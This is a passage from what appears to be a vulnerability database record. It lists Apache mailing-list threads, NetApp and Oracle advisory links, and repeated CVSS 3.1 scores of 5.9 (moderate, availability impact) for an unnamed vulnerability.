url https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272@%3Cissues.activemq.apache.org%3E
22
reference_url https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272%40%3Cissues.activemq.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/053d9ce4d579b02203db18545fee5e33f35f2932885459b74d1e4272%40%3Cissues.activemq.apache.org%3E
23
reference_url https://lists.apache.org/thread.html/19fa48533bc7ea1accf6b12746a74ed888ae6e49a5cf81ae4f807495@%3Ccommon-dev.hadoop.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/19fa48533bc7ea1accf6b12746a74ed888ae6e49a5cf81ae4f807495@%3Ccommon-dev.hadoop.apache.org%3E
24
reference_url https://lists.apache.org/thread.html/19fa48533bc7ea1accf6b12746a74ed888ae6e49a5cf81ae4f807495%40%3Ccommon-dev.hadoop.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/19fa48533bc7ea1accf6b12746a74ed888ae6e49a5cf81ae4f807495%40%3Ccommon-dev.hadoop.apache.org%3E
25
reference_url https://lists.apache.org/thread.html/33c6bccfeb7adf644d4d79894ca8f09370be6ed4b20632c2e228d085@%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/33c6bccfeb7adf644d4d79894ca8f09370be6ed4b20632c2e228d085@%3Ccommits.cassandra.apache.org%3E
26
reference_url https://lists.apache.org/thread.html/33c6bccfeb7adf644d4d79894ca8f09370be6ed4b20632c2e228d085%40%3Ccommits.cassandra.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/33c6bccfeb7adf644d4d79894ca8f09370be6ed4b20632c2e228d085%40%3Ccommits.cassandra.apache.org%3E
27
reference_url https://lists.apache.org/thread.html/3d5dbdd92ac9ceaef90e40f78599f9109f2f345252e0ac9d98e7e084@%3Cgitbox.activemq.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/3d5dbdd92ac9ceaef90e40f78599f9109f2f345252e0ac9d98e7e084@%3Cgitbox.activemq.apache.org%3E
28
reference_url https://lists.apache.org/thread.html/3d5dbdd92ac9ceaef90e40f78599f9109f2f345252e0ac9d98e7e084%40%3Cgitbox.activemq.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/3d5dbdd92ac9ceaef90e40f78599f9109f2f345252e0ac9d98e7e084%40%3Cgitbox.activemq.apache.org%3E
29
reference_url https://lists.apache.org/thread.html/3ddd79c801edd99c0978e83dbe2168ebd36fd42acfa5dac38fb03dd6@%3Cissues.activemq.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/3ddd79c801edd99c0978e83dbe2168ebd36fd42acfa5dac38fb03dd6@%3Cissues.activemq.apache.org%3E
30
reference_url https://lists.apache.org/thread.html/3ddd79c801edd99c0978e83dbe2168ebd36fd42acfa5dac38fb03dd6%40%3Cissues.activemq.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/3ddd79c801edd99c0978e83dbe2168ebd36fd42acfa5dac38fb03dd6%40%3Cissues.activemq.apache.org%3E
31
reference_url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E
32
reference_url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E
33
reference_url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E
34
reference_url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E
35
reference_url https://lists.apache.org/thread.html/cc48fe770c45a74dc3b37ed0817393e0c96701fc49bc431ed922f3cc@%3Chdfs-dev.hadoop.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/cc48fe770c45a74dc3b37ed0817393e0c96701fc49bc431ed922f3cc@%3Chdfs-dev.hadoop.apache.org%3E
36
reference_url https://lists.apache.org/thread.html/cc48fe770c45a74dc3b37ed0817393e0c96701fc49bc431ed922f3cc%40%3Chdfs-dev.hadoop.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/cc48fe770c45a74dc3b37ed0817393e0c96701fc49bc431ed922f3cc%40%3Chdfs-dev.hadoop.apache.org%3E
37
reference_url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E
38
reference_url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E
39
reference_url https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E
40
reference_url https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E
41
reference_url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cdev.flink.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cdev.flink.apache.org%3E
42
reference_url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cuser.flink.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cuser.flink.apache.org%3E
43
reference_url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb%40%3Cdev.flink.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb%40%3Cdev.flink.apache.org%3E
44
reference_url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb%40%3Cuser.flink.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb%40%3Cuser.flink.apache.org%3E
45
reference_url https://lists.apache.org/thread.html/r223bc776a077d0795786c38cbc6e7dd808fce1a9161b00ba9c0a5d55@%3Cissues.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r223bc776a077d0795786c38cbc6e7dd808fce1a9161b00ba9c0a5d55@%3Cissues.lucene.apache.org%3E
46
reference_url https://lists.apache.org/thread.html/r223bc776a077d0795786c38cbc6e7dd808fce1a9161b00ba9c0a5d55%40%3Cissues.lucene.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r223bc776a077d0795786c38cbc6e7dd808fce1a9161b00ba9c0a5d55%40%3Cissues.lucene.apache.org%3E
47
reference_url https://lists.apache.org/thread.html/r22c8173b804cd4a420c43064ba4e363d0022aa421008b1989f7354d4@%3Cissues.flink.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r22c8173b804cd4a420c43064ba4e363d0022aa421008b1989f7354d4@%3Cissues.flink.apache.org%3E
48
reference_url https://lists.apache.org/thread.html/r22c8173b804cd4a420c43064ba4e363d0022aa421008b1989f7354d4%40%3Cissues.flink.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r22c8173b804cd4a420c43064ba4e363d0022aa421008b1989f7354d4%40%3Cissues.flink.apache.org%3E
49
reference_url https://lists.apache.org/thread.html/r27eb79a87a760335226dbfa6a7b7bffea539a535f8e80c41e482106d@%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r27eb79a87a760335226dbfa6a7b7bffea539a535f8e80c41e482106d@%3Cdev.cxf.apache.org%3E
50
reference_url https://lists.apache.org/thread.html/r27eb79a87a760335226dbfa6a7b7bffea539a535f8e80c41e482106d%40%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r27eb79a87a760335226dbfa6a7b7bffea539a535f8e80c41e482106d%40%3Cdev.cxf.apache.org%3E
51
reference_url https://lists.apache.org/thread.html/r2ea4e5e5aa8ad73b001a466c582899620961f47d77a40af712c1fdf9@%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r2ea4e5e5aa8ad73b001a466c582899620961f47d77a40af712c1fdf9@%3Cdev.cxf.apache.org%3E
52
reference_url https://lists.apache.org/thread.html/r2ea4e5e5aa8ad73b001a466c582899620961f47d77a40af712c1fdf9%40%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r2ea4e5e5aa8ad73b001a466c582899620961f47d77a40af712c1fdf9%40%3Cdev.cxf.apache.org%3E
53
reference_url https://lists.apache.org/thread.html/r30e7d7b6bfa630dacc41649a0e96dad75165d50474c1241068aa0f94@%3Cissues.storm.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r30e7d7b6bfa630dacc41649a0e96dad75165d50474c1241068aa0f94@%3Cissues.storm.apache.org%3E
54
reference_url https://lists.apache.org/thread.html/r30e7d7b6bfa630dacc41649a0e96dad75165d50474c1241068aa0f94%40%3Cissues.storm.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r30e7d7b6bfa630dacc41649a0e96dad75165d50474c1241068aa0f94%40%3Cissues.storm.apache.org%3E
55
reference_url https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E
56
reference_url https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21%40%3Ccommits.samza.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21%40%3Ccommits.samza.apache.org%3E
57
reference_url https://lists.apache.org/thread.html/r38e2ab87528d3c904e7fac496e8fd766b9277656ff95b97d6b6b6dcd@%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r38e2ab87528d3c904e7fac496e8fd766b9277656ff95b97d6b6b6dcd@%3Cdev.cxf.apache.org%3E
58
reference_url https://lists.apache.org/thread.html/r38e2ab87528d3c904e7fac496e8fd766b9277656ff95b97d6b6b6dcd%40%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r38e2ab87528d3c904e7fac496e8fd766b9277656ff95b97d6b6b6dcd%40%3Cdev.cxf.apache.org%3E
59
reference_url https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748@%3Ccommits.pulsar.apache.org%3E
60
reference_url https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r3c3b33ee5bef0c67391d27a97cbfd89d44f328cf072b601b58d4e748%40%3Ccommits.pulsar.apache.org%3E
61
reference_url https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540@%3Cdev.syncope.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540@%3Cdev.syncope.apache.org%3E
62
reference_url https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540%40%3Cdev.syncope.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r43491b25b2e5c368c34b106a82eff910a5cea3e90de82ad75cc16540%40%3Cdev.syncope.apache.org%3E
63
reference_url https://lists.apache.org/thread.html/r50fc0bcc734dd82e691d36d209258683141bfc0083739a77e56ad92d@%3Cdev.flink.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r50fc0bcc734dd82e691d36d209258683141bfc0083739a77e56ad92d@%3Cdev.flink.apache.org%3E
64
reference_url https://lists.apache.org/thread.html/r50fc0bcc734dd82e691d36d209258683141bfc0083739a77e56ad92d%40%3Cdev.flink.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r50fc0bcc734dd82e691d36d209258683141bfc0083739a77e56ad92d%40%3Cdev.flink.apache.org%3E
65
reference_url https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba@%3Cissues.maven.apache.org%3E
66
reference_url https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r841c5e14e1b55281523ebcde661ece00b38a0569e00ef5e12bd5f6ba%40%3Cissues.maven.apache.org%3E
67
reference_url https://lists.apache.org/thread.html/r95799427b335807a4c54776908125c3e66597b65845ae50096d9278a@%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/r95799427b335807a4c54776908125c3e66597b65845ae50096d9278a@%3Cdev.cxf.apache.org%3E
68
reference_url https://lists.apache.org/thread.html/r95799427b335807a4c54776908125c3e66597b65845ae50096d9278a%40%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/r95799427b335807a4c54776908125c3e66597b65845ae50096d9278a%40%3Cdev.cxf.apache.org%3E
69
reference_url https://lists.apache.org/thread.html/ra0adb9653c7de9539b93cc8434143b655f753b9f60580ff260becb2b@%3Cusers.kafka.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra0adb9653c7de9539b93cc8434143b655f753b9f60580ff260becb2b@%3Cusers.kafka.apache.org%3E
70
reference_url https://lists.apache.org/thread.html/ra0adb9653c7de9539b93cc8434143b655f753b9f60580ff260becb2b%40%3Cusers.kafka.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ra0adb9653c7de9539b93cc8434143b655f753b9f60580ff260becb2b%40%3Cusers.kafka.apache.org%3E
71
reference_url https://lists.apache.org/thread.html/ra4f44016926dcb034b3b230280a18102062f94ae55b8a31bb92fed84@%3Cissues.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra4f44016926dcb034b3b230280a18102062f94ae55b8a31bb92fed84@%3Cissues.lucene.apache.org%3E
72
reference_url https://lists.apache.org/thread.html/ra4f44016926dcb034b3b230280a18102062f94ae55b8a31bb92fed84%40%3Cissues.lucene.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ra4f44016926dcb034b3b230280a18102062f94ae55b8a31bb92fed84%40%3Cissues.lucene.apache.org%3E
73
reference_url https://lists.apache.org/thread.html/ra8906723927aef2a599398c238eacfc845b74d812e0093ec2fc70a7d@%3Cissues.flink.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/ra8906723927aef2a599398c238eacfc845b74d812e0093ec2fc70a7d@%3Cissues.flink.apache.org%3E
74
reference_url https://lists.apache.org/thread.html/ra8906723927aef2a599398c238eacfc845b74d812e0093ec2fc70a7d%40%3Cissues.flink.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/ra8906723927aef2a599398c238eacfc845b74d812e0093ec2fc70a7d%40%3Cissues.flink.apache.org%3E
75
reference_url https://lists.apache.org/thread.html/rb3da574c34bc6bd37972d2266af3093b90d7e437460423c24f477919@%3Cissues.lucene.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rb3da574c34bc6bd37972d2266af3093b90d7e437460423c24f477919@%3Cissues.lucene.apache.org%3E
76
reference_url https://lists.apache.org/thread.html/rb3da574c34bc6bd37972d2266af3093b90d7e437460423c24f477919%40%3Cissues.lucene.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rb3da574c34bc6bd37972d2266af3093b90d7e437460423c24f477919%40%3Cissues.lucene.apache.org%3E
77
reference_url https://lists.apache.org/thread.html/rc78f6e84f82cc662860e96526d8ab969f34dbe12dc560e22d9d147a3@%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc78f6e84f82cc662860e96526d8ab969f34dbe12dc560e22d9d147a3@%3Cdev.cxf.apache.org%3E
78
reference_url https://lists.apache.org/thread.html/rc78f6e84f82cc662860e96526d8ab969f34dbe12dc560e22d9d147a3%40%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rc78f6e84f82cc662860e96526d8ab969f34dbe12dc560e22d9d147a3%40%3Cdev.cxf.apache.org%3E
79
reference_url https://lists.apache.org/thread.html/rc8467f357b943ceaa86f289f8bc1a5d1c7955b75d3bac1426f2d4ac1@%3Ccommon-dev.hadoop.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rc8467f357b943ceaa86f289f8bc1a5d1c7955b75d3bac1426f2d4ac1@%3Ccommon-dev.hadoop.apache.org%3E
80
reference_url https://lists.apache.org/thread.html/rc8467f357b943ceaa86f289f8bc1a5d1c7955b75d3bac1426f2d4ac1%40%3Ccommon-dev.hadoop.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rc8467f357b943ceaa86f289f8bc1a5d1c7955b75d3bac1426f2d4ac1%40%3Ccommon-dev.hadoop.apache.org%3E
81
reference_url https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E
82
reference_url https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E
83
reference_url https://lists.apache.org/thread.html/rd0c8ec6e044aa2958dd0549ebf8ecead7f5968c9474ba73a504161b2@%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rd0c8ec6e044aa2958dd0549ebf8ecead7f5968c9474ba73a504161b2@%3Cdev.cxf.apache.org%3E
84
reference_url https://lists.apache.org/thread.html/rd0c8ec6e044aa2958dd0549ebf8ecead7f5968c9474ba73a504161b2%40%3Cdev.cxf.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rd0c8ec6e044aa2958dd0549ebf8ecead7f5968c9474ba73a504161b2%40%3Cdev.cxf.apache.org%3E
85
reference_url https://lists.apache.org/thread.html/rdc56c15693c236e31e1e95f847b8e5e74fc0a05741d47488e7fc8c45@%3Cissues.flink.apache.org%3E
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.apache.org/thread.html/rdc56c15693c236e31e1e95f847b8e5e74fc0a05741d47488e7fc8c45@%3Cissues.flink.apache.org%3E
86
reference_url https://lists.apache.org/thread.html/rdc56c15693c236e31e1e95f847b8e5e74fc0a05741d47488e7fc8c45%40%3Cissues.flink.apache.org%3E
reference_id
reference_type
scores
url https://lists.apache.org/thread.html/rdc56c15693c236e31e1e95f847b8e5e74fc0a05741d47488e7fc8c45%40%3Cissues.flink.apache.org%3E
87
reference_url https://security.netapp.com/advisory/ntap-20220629-0008
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://security.netapp.com/advisory/ntap-20220629-0008
88
reference_url https://security.netapp.com/advisory/ntap-20220629-0008/
reference_id
reference_type
scores
url https://security.netapp.com/advisory/ntap-20220629-0008/
89
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
90
reference_url https://www.oracle.com/security-alerts/cpujan2021.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujan2021.html
91
reference_url https://www.oracle.com/security-alerts/cpujul2020.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpujul2020.html
92
reference_url https://www.oracle.com/security-alerts/cpuoct2021.html
reference_id
reference_type
scores
0
value 5.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
1
